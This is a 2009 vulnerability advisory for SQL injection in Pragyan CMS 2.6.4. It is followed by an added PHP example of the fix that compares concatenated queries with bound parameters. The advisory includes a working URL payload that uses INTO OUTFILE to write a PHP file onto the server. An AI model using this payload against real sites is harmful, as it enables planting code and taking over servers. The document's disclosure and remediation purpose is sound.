******* Salvatore "drosophila" Fresta *******
[+] Application: Pragyan CMS
[+] Version: 2.6.4
[+] Website: http://www.pragyan.org
[+] Bugs: [A] Multiple SQL Injection
[+] Exploitation: Remote
[+] Date: 22 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Multiple SQL Injection
[-] Risk: high
[-] Requisites: magic_quotes_gpc = off/on
This web application is entirely vulnerable to
SQL Injection because no variable is properly
sanitised before being used in an SQL query.
This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
*************************************************
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/?action=view&fileget=-1' UNION ALL SELECT
'evil_code',2,3,4,5,6,7 INTO OUTFILE '/path/evil.php'%23
*************************************************
[+] Fix
You must sanitise all user input.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
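
The "Fix" section above, illustrated with an added example that is not part of the original advisory and is not Pragyan CMS code: a string-concatenated lookup beside a version that validates the `fileget` value and binds it as a parameter. The `files` table, its columns, both function names and the in-memory SQLite database (standing in for the CMS's database so the script runs offline) are assumptions.

```php
<?php
// Added example; not Pragyan CMS code. The files table, its columns and both
// function names are hypothetical. Needs the pdo_sqlite extension.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE files (id INTEGER PRIMARY KEY, name TEXT)");
$db->exec("INSERT INTO files (id, name) VALUES (1, 'report.pdf')");

// Before: the request value becomes part of the SQL text.
function lookupUnsafe(PDO $db, string $fileget): array
{
    $sql = "SELECT id, name FROM files WHERE id = '" . $fileget . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// After: reject anything that is not a plain integer, then bind the value.
function lookupSafe(PDO $db, string $fileget): array
{
    if (!ctype_digit($fileget)) {
        return [];
    }
    $stmt = $db->prepare("SELECT id, name FROM files WHERE id = :id");
    $stmt->bindValue(':id', (int) $fileget, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input: same shape as the advisory's string, with the
// INTO OUTFILE clause left out and the column count matched to this table.
$payload = "-1' UNION ALL SELECT 2, 'row-from-union' -- ";

foreach (['1', $payload] as $input) {
    printf("input: %s\n", $input);
    printf("  concatenated: %s\n", json_encode(lookupUnsafe($db, $input)));
    printf("  bound:        %s\n", json_encode(lookupSafe($db, $input)));
}
```

On MySQL, the `INTO OUTFILE` step shown in the advisory also depends on the database account holding the `FILE` privilege and on the server's `secure_file_priv` setting; restricting both limits the impact of an injection but does not replace bound parameters.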